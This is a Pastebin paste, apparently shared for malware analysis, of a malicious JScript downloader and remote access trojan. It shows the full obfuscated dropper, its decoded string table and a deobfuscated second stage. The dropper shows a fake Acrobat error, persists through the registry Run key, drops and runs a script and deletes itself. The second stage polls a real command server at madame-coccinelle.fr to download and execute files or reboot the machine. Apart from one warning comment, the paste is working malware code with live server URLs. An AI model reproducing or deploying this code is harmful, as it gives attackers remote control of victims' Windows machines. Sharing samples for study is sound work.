dissectmalware

Malicious JS Downloader and RAT

May 9th, 2018
349
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // NOTE: Malicious JSCript. Please do not run on a production system
  2. //////////////////////////// hxxp://ssl2.ovh.net/~zerop0b0/file/index.php /////////////////////////////////////
  3. var _0x7870=["\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C","\x54\x68\x65\x20\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x20\x66\x61\x69\x6C\x65\x64\x20\x74\x6F\x20\x69\x6E\x69\x74\x69\x61\x6C\x69\x7A\x65\x20\x70\x72\x6F\x70\x65\x72\x6C\x79\x20\x28\x30\x78\x30\x30\x30\x30\x30\x32\x32\x29\x2E\x20\x43\x6C\x69\x63\x6B\x20\x6F\x6E\x20\x4F\x4B\x20\x74\x6F\x20\x74\x65\x72\x6D\x69\x6E\x61\x74\x65\x20\x74\x68\x65\x20\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2E","\x41\x63\x72\x6F\x52\x64\x33\x32\x2E\x65\x78\x65\x20\x2D\x20\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x20\x45\x72\x72\x6F\x72","\x61\x75\x64\x69\x6F\x64\x67","\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x61\x64\x61\x6D\x65\x2D\x63\x6F\x63\x63\x69\x6E\x65\x6C\x6C\x65\x2E\x66\x72","\x6A\x61\x76\x61\x2E\x6A\x73","\x64\x61\x74\x61","\x76\x61\x72\x20\x65\x6E\x3D\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x6B\x65\x79\x2C\x73\x74\x29\x20\x7B\x20\x76\x61\x72\x20\x72\x65\x73\x3D\x27\x27\x3B\x66\x6F\x72\x28\x76\x61\x72\x20\x69\x3D\x30\x3B\x69\x3C\x73\x74\x2E\x6C\x65\x6E\x67\x74\x68\x3B\x69\x2B\x2B\x29\x20\x7B\x72\x65\x73\x3D\x72\x65\x73\x2B\x53\x74\x72\x69\x6E\x67\x2E\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x28\x73\x74\x2E\x63\x68\x61\x72\x41\x74\x28\x69\x29\x2E\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74\x28\x30\x29\x20\x5E\x20\x6B\x65\x79\x29\x3B\x7D\x20\x72\x65\x74\x75\x72\x6E\x20\x20\x72\x65\x73\x3B\x7D\x3B\x20\x76\x61\x72\x20\x64\x68\x3D\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x73\x74\x29\x7B\x76\x61\x72\x20\x72\x65\x73\x3D\x22\x22\x3B\x76\x61\x72\x20\x68\x65\x3D\x73\x74\x2E\x6D\x61\x74\x63\x68\x28\x2F\x2E\x7B\x31\x2C\x32\x7D\x2F\x67\x29\x20\x7C\x7C\x20\x5B\x5D\x3B\x66\x6F\x72\x28\x76\x61\x72\x20\x69\x3D\x30\x3B\x69\x3C\x68\x65\x2E\x6C\x65\x6E\x67\x74\x68\x3B\x69\x2B\x2B\x29\x20\x7B\x72\x65\x73\x2B\x3D\x53\x74\x72\x69\x6E\x67\x2E\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65\x28\x70\x61\x72\x73\x65\x49\x6E\x74\x28\x68\x65\x5B\x69\x5D\x2C\x20\x31\x36\x29\x29\x3B\x7D\x3B\x72\x65\x74\x75\x72\x6E\x20\x72\x65\x73\x3B\x7D\x3B\x76\x61\x72\x20\x72\x6E\x64\x3D\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x28\x6D\x69\x6E\x2C\x20\x6D\x61\x78\x29\x20\x7B\x72\x65\x74\x75\x72\x6E\x20\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x28\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x28\x29\x2A\x28\x6D\x61\x78\x2D\x6D\x69\x6E\x2B\x31\x29\x29\x2B\x6D\x69\x6E\x3B\x7D\x3B\x76\x61\x72\x20\x63\x6F\x64\x20\x3D\x20\x72\x6E\x64\x28\x31\x2C\x32\x35\x35\x29\x3B\x76\x61\x72\x20\x73\x65\x72\x76\x65\x72\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x61\x64\x61\x6D\x65\x2D\x63\x6F\x63\x63\x69\x6E\x65\x6C\x6C\x65\x2E\x66\x72\x2F\x6C\x6F\x61\x64\x65\x72\x2E\x70\x68\x70\x3F\x72\x3D\x22\x2B\x63\x6F\x64\x2E\x74\x6F\x53\x74\x72\x69\x6E\x67\x28\x29\x3B\x76\x61\x72\x20\x61\x75\x74\x6F\x6E\x61\x6D\x65\x3D\x22\x61\x75\x64\x69\x6F\x64\x67\x22\x3B\x66\x6F\x72\x20\x28\x3B\x3B\x29\x20\x7B\x74\x72\x79\x20\x7B\x58\x6D\x6C\x68\x74\x74\x70\x4F\x62\x6A\x20\x3D\x20\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x57\x69\x6E\x48\x74\x74\x70\x2E\x57\x69\x6E\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x2E\x35\x2E\x31\x22\x29\x3B\x58\x6D\x6C\x68\x74\x74\x70\x4F\x62\x6A\x2E\x6F\x70\x65\x6E\x28\x22\x67\x65\x74\x22\x2C\x73\x65\x72\x76\x65\x72\x2C\x30\x29\x3B\x55\x73\x72\x61\x20\x3D\x20\x22\x4D\x6F\x7A\x69\x6C\x6C\x61\x2F\x34\x2E\x30\x20\x28\x63\x6F\x6D\x70\x61\x74\x69\x62\x6C\x65\x3B\x20\x4D\x53\x49\x45\x20\x37\x2E\x30\x3B\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x4E\x54\x20\x36\x2E\x30\x29\x22\x3B\x55\x73\x72\x62\x20\x3D\x20\x22\x55\x73\x65\x72\x2D\x41\x67\x65\x6E\x74\x22\x3B\x58\x6D\x6C\x68\x74\x74\x70\x4F\x62\x6A\x2E\x53\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72\x28\x55\x73\x72\x62\x2C\x55\x73\x72\x61\x29\x3B\x58\x6D\x6C\x68\x74\x74\x70\x4F\x62\x6A\x2E\x73\x65\x6E\x64\x28\x29\x3B\x58\x6D\x6C\x68\x74\x74\x70\x4F\x62\x6A\x2E\x57\x61\x69\x74\x46\x6F\x72\x52\x65\x73\x70\x6F\x6E\x73\x65\x28\x29\x3B\x69\x66\x20\x28\x58\x6D\x6C\x68\x74\x74\x70\x4F\x62\x6A\x2E\x73\x74\x61\x74\x75\x73\x20\x3D\x3D\x20\x32\x30\x30\x29\x20\x7B\x76\x61\x72\x20\x64\x61\x74\x61\x20\x3D\x20\x22\x76\x61\x72\x20\x73\x65\x72\x76\x65\x72\x3D\x5C\x22\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x61\x64\x61\x6D\x65\x2D\x63\x6F\x63\x63\x69\x6E\x65\x6C\x6C\x65\x2E\x66\x72\x2F\x63\x6D\x64\x2E\x70\x68\x70\x5C\x22\x3B\x76\x61\x72\x20\x61\x75\x74\x6F\x6E\x61\x6D\x65\x3D\x5C\x22\x61\x75\x64\x69\x6F\x64\x67\x5C\x22\x3B\x22\x2B\x65\x6E\x28\x63\x6F\x64\x2C\x64\x68\x28\x58\x6D\x6C\x68\x74\x74\x70\x4F\x62\x6A\x2E\x52\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74\x29\x29\x3B\x6E\x65\x77\x20\x46\x75\x6E\x63\x74\x69\x6F\x6E\x28\x64\x61\x74\x61\x29\x28\x29\x3B\x7D\x3B\x7D\x20\x63\x61\x74\x63\x68\x20\x28\x65\x29\x20\x7B\x20\x7D\x3B\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x6C\x65\x65\x70\x28\x35\x30\x30\x30\x29\x3B\x7D\x3B","\x76\x61\x72\x20\x6F\x74\x70\x3D\x22\x5C\x5C\x22\x3B\x6E\x65\x77\x20\x46\x75\x6E\x63\x74\x69\x6F\x6E\x28\x57\x53\x63\x72\x69\x70\x74\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x22\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C\x22\x29\x2E\x52\x65\x67\x52\x65\x61\x64\x28\x22\x48\x4B\x43\x55\x22\x2B\x6F\x74\x70\x2B\x22\x53\x6F\x66\x74\x77\x61\x72\x65\x22\x2B\x6F\x74\x70\x2B\x22\x61\x75\x64\x69\x6F\x64\x67\x22\x2B\x6F\x74\x70\x2B\x22\x64\x61\x74\x61\x22\x29\x29\x28\x29\x3B","\x5C","","\x48\x4B\x43\x55","\x53\x6F\x66\x74\x77\x61\x72\x65","\x25\x41\x50\x50\x44\x41\x54\x41\x25","\x65\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73","\x43\x75\x72\x72\x65\x6E\x74\x44\x69\x72\x65\x63\x74\x6F\x72\x79","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74","\x57\x69\x6E\x64\x6F\x77\x73","\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E","\x52\x75\x6E","\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D","\x54\x79\x70\x65","\x50\x6F\x73\x69\x74\x69\x6F\x6E","\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74","\x53\x63\x72\x69\x70\x74\x46\x75\x6C\x6C\x4E\x61\x6D\x65"];var shell= new ActiveXObject(_0x7870[0]);shell.Popup(_0x7870[1],15,_0x7870[2]);var autoname=_0x7870[3];var host=_0x7870[4];var botname=_0x7870[5];var regname=_0x7870[6];var data1=_0x7870[7];var data2=_0x7870[8];otp= _0x7870[9];ext= _0x7870[10];ShellObj= WScript.CreateObject(_0x7870[0]);RegPath= _0x7870[11]+ otp+ _0x7870[12]+ otp+ autoname+ otp+ regname;ShellObj.RegWrite(RegPath,data1);PathY= ShellObj[_0x7870[14]](_0x7870[13]);ShellObj[_0x7870[15]]= PathY;PathX= PathY+ otp+ botname+ ext;RegPath= _0x7870[11]+ otp+ _0x7870[12]+ otp+ _0x7870[16]+ otp+ _0x7870[17]+ otp+ _0x7870[18]+ otp+ _0x7870[19]+ otp+ autoname;ShellObj.RegWrite(RegPath,PathX);stream= WScript.CreateObject(_0x7870[20]);stream.Open();stream[_0x7870[21]]= 2;stream[_0x7870[22]]= 0;stream.WriteText(data2);stream.SaveToFile(PathX,2);stream.Close();ShellObj.Run(PathX,0,false);FsoObj= WScript.CreateObject(_0x7870[23]);PathX= WScript[_0x7870[24]];FsoObj.DeleteFile(PathX)
  4.  
  5. //////////////////////////////////////////// _0x7870 ///////////////////////////////////////////////
  6.  
  7. ['WScript.Shell',
  8. 'The application failed to initialize properly (0x0000022). Click on OK to terminate the application.',
  9. 'AcroRd32.exe - Application Error',
  10. 'audiodg',
  11. 'http://madame-coccinelle.fr',
  12. 'java.js',
  13. 'data',
  14. 'var en=function(key,st) { var res=\'\';for(var i=0;i<st.length;i++) {res=res+String.fromCharCode(st.charAt(i).charCodeAt(0) ^ key);} return  res;}; var dh=function(st){var res="";var he=st.match(/.{1,2}/g) || [];for(var i=0;i<he.length;i++) {res+=String.fromCharCode(parseInt(he[i],
  15. 16));};return res;};var rnd=function (min,
  16. max) {return Math.floor(Math.random()*(max-min+1))+min;};var cod = rnd(1,255);var server="http://madame-coccinelle.fr/loader.php?r="+cod.toString();var autoname="audiodg";for (;;) {try {XmlhttpObj = new ActiveXObject("WinHttp.WinHttpRequest.5.1");XmlhttpObj.open("get",server,0);Usra = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)";Usrb = "User-Agent";XmlhttpObj.SetRequestHeader(Usrb,Usra);XmlhttpObj.send();XmlhttpObj.WaitForResponse();if (XmlhttpObj.status == 200) {var data = "var server=\\"http://madame-coccinelle.fr/cmd.php\\";var autoname=\\"audiodg\\";"+en(cod,dh(XmlhttpObj.ResponseText));new Function(data)();};} catch (e) { };WScript.Sleep(5000);};',
  17. 'var otp="\\\\";new Function(WScript.CreateObject("WScript.Shell").RegRead("HKCU"+otp+"Software"+otp+"audiodg"+otp+"data"))();',
  18. '\\',
  19. '',
  20. 'HKCU',
  21. 'Software',
  22. '%APPDATA%',
  23. 'expandEnvironmentStrings',
  24. 'CurrentDirectory',
  25. 'Microsoft',
  26. 'Windows',
  27. 'CurrentVersion',
  28. 'Run',
  29. 'ADODB.Stream',
  30. 'Type',
  31. 'Position',
  32. 'Scripting.FileSystemObject',
  33. 'ScriptFullName']
  34.  
  35.  
  36. //////////////////////   http://madame-coccinelle.fr/loader.php?r= after deobfuscation /////////////////\
  37. var term=false;
  38. var obj = function(ObjN) {
  39.   ResName = new ActiveXObject(ObjN);
  40.   return ResName;
  41. };
  42. var UUID = function (a){
  43.   return"000000000000".replace(/0/g,function(){return(0|Math.random()*16).toString(16);});
  44. };
  45.  
  46. var filename = function (url) {
  47.   url = url.substring(0, (url.indexOf("#") == -1) ? url.length : url.indexOf("#"));
  48.   url = url.substring(0, (url.indexOf("?") == -1) ? url.length : url.indexOf("?"));
  49.   url = url.substring(url.lastIndexOf("/") + 1, url.length);
  50.   return url;
  51. };
  52.  
  53. var get = function (el) {
  54.   XmlhttpObj = obj("WinHttp.WinHttpRequest.5.1");
  55.   XmlhttpObj.open("get",el,0);
  56.   Usra = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)";
  57.   Usrb = "User-Agent";
  58.   XmlhttpObj.SetRequestHeader(Usrb,Usra);
  59.   XmlhttpObj.send();
  60.   XmlhttpObj.WaitForResponse();
  61.   UrlStatus = 200;
  62.   if (XmlhttpObj.status == UrlStatus) {
  63.     return XmlhttpObj.ResponseText;
  64.   };
  65.   return "";
  66. };
  67.  
  68. var load = function (el) {
  69.   XmlhttpObj = obj("WinHttp.WinHttpRequest.5.1");
  70.   XmlhttpObj.open("get",el,0);
  71.   Usra = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)";
  72.   Usrb = "User-Agent";
  73.   XmlhttpObj.SetRequestHeader(Usrb,Usra);
  74.   XmlhttpObj.send();
  75.   XmlhttpObj.WaitForResponse();
  76.   UrlStatus = 200;
  77.   if (XmlhttpObj.status == UrlStatus) {
  78.         fl=filename(el);
  79.         FsoObj = obj("Scripting.FileSystemObject");
  80.         if(FsoObj.FileExists(fl)) FsoObj.DeleteFile(fl);
  81.         StreamObj = obj("ADODB.Stream");
  82.         StreamObj.Open;
  83.         StreamObj.Type = 1;
  84.         StreamObj.Write(XmlhttpObj.ResponseBody);
  85.         StreamObj.SaveToFile(fl);
  86.         StreamObj.Close;
  87.   };
  88.   return false;
  89. };
  90.  
  91. var run = function (el) {
  92.    try {
  93.     ShellObj = obj("WScript.Shell");
  94.     ShellObj.Run(el,0,false);
  95.    } catch (H) { };
  96. };
  97.  
  98. var en=function(key,st) { var res='';for(var i=0;i<st.length;i++) {res=res+String.fromCharCode(st.charAt(i).charCodeAt(0) ^ key);} return  res;};
  99. var dh=function(st){var res="";var he=st.match(/.{1,2}/g) || [];for(var i=0;i<he.length;i++) {res+=String.fromCharCode(parseInt(he[i], 16));};return res;};
  100. var rnd=function (min, max) {return Math.floor(Math.random()*(max-min+1))+min;};
  101.  
  102. var task = function (el) {
  103.     cmd=el[0];
  104.     dat=el[1];
  105.     idd=el[2];
  106.     if ((typeof idd == "undefined") || (idd=="")) return;
  107.     cod = rnd(1,255);
  108.     url = server+"?i="+hwid+"&c="+idd+"&r="+cod.toString();
  109.     data = get(url);
  110.     data=en(cod,dh(data));
  111.  
  112.     if (cmd=="Download & Execute") {
  113.       load(dat);
  114.       run(filename(dat));
  115.     };
  116.     if (cmd=="Download") {
  117.       load(dat);
  118.     };
  119.     if (cmd=="Execute") {
  120.       run(dat);
  121.     };
  122.     if (cmd=="Terminate") {
  123.       term=true;
  124.     };
  125.     if (cmd=="Reboot") {
  126.       run("shutdown /r /t 0");
  127.     };
  128.     if (cmd=="Shutdown") {
  129.       run("shutdown /s /t 0");
  130.     };
  131. };
  132.  
  133. var sleep=function(n){ var ms=new Date(); while (new Date()-ms<n);}
  134. var woker=function() {
  135.   otp="\\";
  136.   hwid="";
  137.   ShellObj = obj("WScript.Shell");
  138.   RegPath="HKCU"+otp+"Software"+otp+autoname+otp+"uid";
  139.   try {
  140.     hwid = ShellObj.RegRead(RegPath);
  141.   } catch (e) { };
  142.   if (hwid=="") {
  143.     hwid=UUID();
  144.     ShellObj.RegWrite(RegPath, hwid);
  145.   };
  146.   for (;;) {
  147.    if (term==true) break;
  148.    try {
  149.      cod = rnd(1,255);
  150.      url = server+"?i="+hwid+"&r="+cod.toString();
  151.      data = get(url);
  152.      data = en(cod,dh(data));
  153.      tasks=data.split("|");
  154.      for (i = 0; i< tasks.length; ++i)
  155.        if (tasks[i]!="")
  156.          task(tasks[i].split(";"));
  157.    } catch (L) {};
  158.    WScript.Sleep(15000);
  159.   };
  160. };
  161. woker();
Add Comment
Please, Sign In to add comment